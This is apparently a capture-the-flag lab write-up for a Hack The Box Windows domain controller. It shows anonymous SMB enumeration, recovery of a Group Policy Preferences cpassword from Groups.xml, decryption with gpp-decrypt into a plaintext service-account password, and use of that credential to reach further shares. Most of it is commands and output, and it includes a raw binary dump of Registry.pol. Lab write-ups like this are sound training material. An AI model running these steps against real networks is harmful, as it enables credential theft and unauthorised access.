SMB
Nmap discovered a Microsoft Windows Directory service running on the target port 139 and 445
┌──(kali㉿kali)-[~/archive/htb/labs/active]
└─$ smbmap -H dc.active.htb -d ACTIVE.HTB
[+] IP: dc.active.htb:445 Name: unknown
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
C$ NO ACCESS Default share
IPC$ NO ACCESS Remote IPC
NETLOGON NO ACCESS Logon server share
Replication READ ONLY
SYSVOL NO ACCESS Logon server share
Users NO ACCESS It would appear that the SMB server allows anonymous login
I have the read only privilege on the \\ACTIVE.HTB\Replication share
The Replication share in Active Directory is used to replicate data between domain controllers in a Windows network. This share is used as a location for storing the replicated files that are used to maintain consistency between domain controllers in the same domain.
The replication share is created during the installation of the first domain controller in a domain and is used to replicate the Active Directory database, SYSVOL, and other files between domain controllers in the same domain.
Null Session
┌──(kali㉿kali)-[~/archive/htb/labs/active]
└─$ smbclient //ACTIVE.HTB/Replication
Password for [WORKGROUP\kali]:
Anonymous login successful
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Sat Jul 21 12:37:44 2018
.. D 0 Sat Jul 21 12:37:44 2018
active.htb D 0 Sat Jul 21 12:37:44 2018
5217023 blocks of size 4096. 284105 blocks available
smb: \> cd active.htb\
smb: \active.htb\> ls
. D 0 Sat Jul 21 12:37:44 2018
.. D 0 Sat Jul 21 12:37:44 2018
DfsrPrivate DHS 0 Sat Jul 21 12:37:44 2018
Policies D 0 Sat Jul 21 12:37:44 2018
scripts D 0 Wed Jul 18 20:48:57 2018
5217023 blocks of size 4096. 284105 blocks available
smb: \active.htb\> I went through the enumeration and the \\ACTIVE.HTB\Replication share has 2 interesting files overall; Groups.xml and Registry.pol
Both are downloaded for assessment
Registry.pol
┌──(kali㉿kali)-[~/…/htb/labs/active/smb]
└─$ cat Registry.pol
Administrator1Policies\Microsoft\SystemCertificates\EFS;EFSBlob;;�;���8�-��=��v�0��0�k�tuB5 �B�,�_�'�0
0
UEFS1(0&U
Administrator11180624185345Z0P10Uificate0
0
UEFS1(0&U
�0� *�H��File Encryption Certificate0�"0
���&�L��?6\
>k� �f)�ZU��g#�渎{��2��t�!�$�t�c��R#i��S�>Y���l��J3G+ڻ&_�;�r.U���Xf_:R�pV��x��B3�J���6Ef��Z=l�N���҈LEA����L��p��1����+RkM��kZ�\��̅�d���2Q�{4�?���.qx��-ik)V^����!6����d��|�>��rcjj��Wbl���3��f��d������Ԓ��W0U0U%0
+�7
00U)0'�%
+�7�
�&�$AdmihVڻ[�\����m�P�D��ʄ�$�Ak�i��0�����.��0%�2ѴJ)���/�f���
���Zs��P��9���� ����#��r�{�lۦ�S�ߨ̻��胇�b��$7gYZ���Cwn}��@�`��&l�N��@7TˉP@��r��N�9r6cߌ�?��F݇��hH��(h�AckY�6U=��#�y/Y�UwFLƦ��M5I[Xq����&y���^v_��F.nt]�hs][Software\Policies\Microsoft\SystemCertificates\EFS\Certificates\3D33FC7B7C6F982A07A49A5C76DA805938A16C6A;Blob;;�;�l25535a36-4ee3-42b9-95d0-b2f03a28ac1aMicrosoft Enhanced Cryptographic Provider v1.Administrator1Y8�lj �0��0�k�tuB5 �B�,�_�'�0
0
UEFS1(0&U
Administrator11180624185345Z0P10Uificate0
0
UEFS1(0&U
�0� *�H��File Encryption Certificate0�"0
���&�L��?6\
>k� �f)�ZU��g#�渎{��2��t�!�$�t�c��R#i��S�>Y���l��J3G+ڻ&_�;�r.U���Xf_:R�pV��x��B3�J���6Ef��Z=l�N���҈LEA����L��p��1����+RkM��kZ�\��̅�d���2Q�{4�?���.qx��-ik)V^����!6����d��|�>��rcjj��Wbl���3��f��d������Ԓ��W0U0U%0
+�7
00U)0'�%
+�7�
�&�$AdmihVڻ[�\����m�P�D��ʄ�$�Ak�i��0�����.��0%�2ѴJ)���/�f���
���Zs��P��9���� ����#��r�{�lۦ�S�ߨ̻��胇�b��$7gYZ���Cwn}��@�`��&l�N��@7TˉP@��r��N�9r6cߌ�?��F݇��hH��(h�AckY�6U=��#�y/Y�UwFLƦ��M5I[Xq����&y���^v_��F.nt]�hs][Software\Policies\Microsoft\SystemCertificates\EFS\CRLs;;;;][Software\Policies\Microsoft\SystemCertificates\EFS\CTLs;;;;]The Registry.pol file is a RPF file in binary format. Some of the strings pints out the administrator user
The file was downloaded from \\ACTIVE.HTB\Replication\active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Registry.pol
Groups.xml
┌──(kali㉿kali)-[~/…/htb/labs/active/smb]
└─$ cat Groups.xml
<?xml version="1.0" encoding="utf-8"?>
<Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}"><User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="active.htb\SVC_TGS" image="2" changed="2018-07-18 20:46:06" uid="{EF57DA28-5F69-4530-A59E-AAB58578219D}"><Properties action="U" newName="" fullName="" description="" cpassword="edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ" changeLogon="0" noChange="1" neverExpires="1" acctDisabled="0" userName="active.htb\SVC_TGS"/></User>
</Groups>The Groups.xml file is an XML file, and initially downloaded from \\ACTIVE.HTB\Replication\active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups\Groups.xml
As the downloaded directory suggest, the file is part of Active Directory Group Policy Preference
The file also contains a user credential from attributes including the name, and cpassword
The username is SVC_TGS
The password string is edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ
The password string above is likely the encrypted and hashed GPP string, which can be decryped easily via the tool, gpp-decrypt
Decryption
┌──(kali㉿kali)-[~/…/htb/labs/active/smb]
└─$ gpp-decrypt 'edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ'
GPPstillStandingStrong2k18gpp-decrypt is natively available in Kali
The actual password for the SVC_TGS user is GPPstillStandingStrong2k18
Before jumping into any other attacks, I first have to confirm that this is indeed a valid credential
Validation
┌──(kali㉿kali)-[~/archive/htb/labs/active]
└─$ smbmap -H dc.active.htb -d ACTIVE.HTB -u 'SVC_TGS' -p 'GPPstillStandingStrong2k18'
[+] IP: dc.active.htb:445 Name: unknown
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
C$ NO ACCESS Default share
IPC$ NO ACCESS Remote IPC
NETLOGON READ ONLY Logon server share
Replication READ ONLY
SYSVOL READ ONLY Logon server share
Users READ ONLYThe SVC_TGS user confirmed to be a valid user.
Based on the naming, it would appear that it is a service account.
I also discovered that there are now 3 additional SMB shares available for enumeration with the credential
SVC_TGS Session
┌──(kali㉿kali)-[~/archive/htb/labs/active]
└─$ smbclient //ACTIVE.HTB/NETLOGON -U 'SVC_TGS%GPPstillStandingStrong2k18'
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Wed Jul 18 20:48:57 2018
.. D 0 Wed Jul 18 20:48:57 2018
5217023 blocks of size 4096. 279064 blocks availableThe //ACTIVE.HTB/NETLOGON share is empty
┌──(kali㉿kali)-[~/archive/htb/labs/active]
└─$ smbclient //ACTIVE.HTB/SYSVOL -U 'SVC_TGS%GPPstillStandingStrong2k18'
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Wed Jul 18 20:48:57 2018
.. D 0 Wed Jul 18 20:48:57 2018
active.htb Dr 0 Wed Jul 18 20:48:57 2018
5217023 blocks of size 4096. 279064 blocks availableThe Replication share is used to replicate the Active Directory database, while the SYSVOL share is used to replicate the GPOs and logon scripts for a domain.
However, the //ACTIVE.HTB/SYSVOL share is more or less appears to be the same as the //ACTIVE.HTB/Replication share
┌──(kali㉿kali)-[~/archive/htb/labs/active]
└─$ smbclient //ACTIVE.HTB/Users -U 'SVC_TGS%GPPstillStandingStrong2k18'
Try "help" to get a list of possible commands.
smb: \> ls
. DR 0 Sat Jul 21 16:39:20 2018
.. DR 0 Sat Jul 21 16:39:20 2018
Administrator D 0 Mon Jul 16 12:14:21 2018
All Users DHSrn 0 Tue Jul 14 07:06:44 2009
Default DHR 0 Tue Jul 14 08:38:21 2009
Default User DHSrn 0 Tue Jul 14 07:06:44 2009
desktop.ini AHS 174 Tue Jul 14 06:57:55 2009
Public DR 0 Tue Jul 14 06:57:55 2009
SVC_TGS D 0 Sat Jul 21 17:16:32 2018
5217023 blocks of size 4096. 279064 blocks available
smb: \Administrator\> dir
NT_STATUS_ACCESS_DENIED listing \Administrator\*
smb: \> cd All Users\
cd \All\: NT_STATUS_OBJECT_NAME_NOT_FOUNDThe //ACTIVE.HTB/Users share appears to be mirroring the C:\Users system directory